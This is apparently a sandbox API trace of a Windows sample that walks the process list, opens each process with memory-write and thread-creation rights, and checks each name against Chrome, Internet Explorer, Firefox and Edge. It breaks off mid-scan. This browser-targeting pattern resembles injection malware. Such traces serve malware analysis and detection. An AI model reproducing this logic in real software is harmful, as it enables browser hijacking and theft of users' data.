	[0223.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.547] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.548] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.548] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.549] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0223.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5738
	[0223.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.550] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0223.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.550] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.550] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0223.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.551] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x573c
	[0223.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.552] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.552] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.552] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.553] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0223.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5740
	[0223.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.554] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0223.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.554] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.554] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0223.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.555] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0223.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5744
	[0223.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.556] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0223.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.556] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.557] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0223.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.557] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0223.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5748
	[0223.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.558] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0223.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.558] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.559] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0223.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.559] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.559] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0223.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x574c
	[0223.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.560] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.560] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.560] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.561] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.561] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5750
	[0223.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.562] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.562] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.562] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.563] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.563] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5754
	[0223.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.564] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.564] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.565] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.565] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.565] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5758
	[0223.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.570] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.570] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.571] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.571] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.571] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x575c
	[0223.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.572] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.572] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.573] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.573] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.573] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5760
	[0223.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.574] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.574] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.575] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.575] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5764
	[0223.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.576] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.576] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.577] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.577] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.577] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5768
	[0223.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.578] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.578] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.579] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.579] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.579] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0223.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x576c
	[0223.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.581] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0223.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.581] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.582] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0223.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.582] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.582] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5770
	[0223.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.583] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.584] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.584] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.584] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0223.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5774
	[0223.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.585] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.586] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.586] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.586] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.586] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5778
	[0223.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.587] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.588] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.588] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.588] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.589] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.589] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x577c
	[0223.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.589] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.590] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.590] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.590] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.591] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5780
	[0223.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.591] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.592] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.592] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.592] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.593] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0223.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5784
	[0223.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.594] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0223.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.594] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.594] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0223.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.594] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.595] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0223.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5788
	[0223.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.598] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.599] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.599] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.599] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.599] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0223.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x578c
	[0223.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.600] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0223.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.600] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.601] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0223.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.601] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.601] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0223.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0223.602] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0223.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5790
	[0223.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.603] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0223.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.603] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.604] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0223.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.604] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.605] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0223.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5794
	[0223.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.606] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0223.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.606] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.606] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0223.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
